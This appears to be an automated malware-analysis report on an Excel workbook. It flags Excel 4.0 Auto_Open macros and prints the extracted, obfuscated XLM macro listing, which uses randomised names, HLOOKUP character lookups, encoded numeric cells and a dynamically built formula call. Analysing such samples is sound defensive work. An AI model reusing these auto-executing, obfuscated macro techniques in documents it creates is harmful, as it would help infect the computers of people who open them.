Verdict: MALICIOUS
Risk Score: 140
Heuristics (3)
- Excel 4.0 Auto_Open defined name (severity: critical, rule: OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (severity: critical, rule: OLE_XLM_DANGEROUS_FN): the Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (severity: medium, rule: OLE_XLM_AUTOOPEN): the workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6693 bytes | a623a69eb47ce4249fd28d6492496b7a60875126c0da83a23db6065d2a87559f |

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - cqGp
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C185
' 0018 23 LABEL : Cell Value, String Constant - BhWcgSJh len=0
' 0018 21 LABEL : Cell Value, String Constant - BxBMxg len=0
' 0018 22 LABEL : Cell Value, String Constant - fBPeREi len=0
' 0018 23 LABEL : Cell Value, String Constant - fcrEwXhW len=0
' 0018 21 LABEL : Cell Value, String Constant - gaGVbY len=0
' 0018 20 LABEL : Cell Value, String Constant - iDbyb len=0
' 0018 22 LABEL : Cell Value, String Constant - iDkxPlO len=0
' 0018 27 LABEL : Cell Value, String Constant - jwVZkWPSIgjM len=0
' 0018 25 LABEL : Cell Value, String Constant - KRBSschGtV len=0
' 0018 23 LABEL : Cell Value, String Constant - lOhOayac len=0
' 0018 20 LABEL : Cell Value, String Constant - lsnyY len=0
' 0018 25 LABEL : Cell Value, String Constant - nIxZGHhmSm len=0
' 0018 21 LABEL : Cell Value, String Constant - oksrDf len=0
' 0018 24 LABEL : Cell Value, String Constant - ORxmuNgQs len=0
' 0018 26 LABEL : Cell Value, String Constant - QYewakSgZMy len=0
' 0018 27 LABEL : Cell Value, String Constant - STARnbevUiWx len=0
' 0018 25 LABEL : Cell Value, String Constant - TirrQToaTc len=0
' 0018 20 LABEL : Cell Value, String Constant - TMKSt len=0
' 0018 20 LABEL : Cell Value, String Constant - wPZzX len=0
' 0018 23 LABEL : Cell Value, String Constant - yznknkAM len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' cqGp,P52,"",396.00000000000000000000
' cqGp,P53,"",958.00000000000000000000
' cqGp,P54,"",294.00000000000000000000
' cqGp,P55,"",805.00000000000000000000
' cqGp,P56,"",395.00000000000000000000
' cqGp,P57,"",-749.00000000000000000000
' cqGp,C89,"SET.NAME("yznknkAM",0+VALUE("0"))",""
' cqGp,C91,"SET.NAME("STARnbevUiWx",yznknkAM)",""
' cqGp,C93,"SET.NAME("QYewakSgZMy",yznknkAM)",""
' cqGp,C95,"SET.NAME("gaGVbY",COUNTA(lOhOayac))",""
' cqGp,C99,"SET.NAME("wPZzX",COUNTA(jwVZkWPSIgjM))",""
' cqGp,C101,[],""
' cqGp,C106,"SET.NAME("fBPeREi","")",""
' cqGp,C111,"STARnbevUiWx",""
' cqGp,C113,"SET.NAME("TMKSt",HLOOKUP("*",lOhOayac,STARnbevUiWx,FALSE))",""
' cqGp,C116,"BhWcgSJh",""
' cqGp,C121,"SET.NAME("BxBMxg",yznknkAM)",""
' cqGp,C124,[],""
' cqGp,C126,"BxBMxg",""
' cqGp,C130,"iDbyb",""
' cqGp,C133,"lsnyY",""
' cqGp,C136,"iDkxPlO",""
' cqGp,C140,"SET.NAME("TirrQToaTc",VALUE(HLOOKUP("*",jwVZkWPSIgjM,iDkxPlO,FALSE)))",""
' cqGp,C145,"oksrDf",""
' cqGp,C147,"fBPeREi",""
' cqGp,C152,"QYewakSgZMy",""
' cqGp,C156,NEXT(),""
' cqGp,C161,"KRBSschGtV",""
' cqGp,C166,[],""
' cqGp,C171,"ORxmuNgQs",""
' cqGp,C176,NEXT(),""
' cqGp,C180,RETURN(),""
' cqGp,C212,"SET.NAME("fcrEwXhW",C89)",""
' cqGp,C214,"lOhOayac",""
' cqGp,C216,"SET.NAME("jwVZkWPSIgjM",R50C14)",""
' cqGp,C219,"SET.NAME("ORxmuNgQs",230)",""
' cqGp,C224,"SET.NAME("nIxZGHhmSm",3)",""
' cqGp,C229,fcrEwXhW(),""
' cqGp,C230,HALT(),""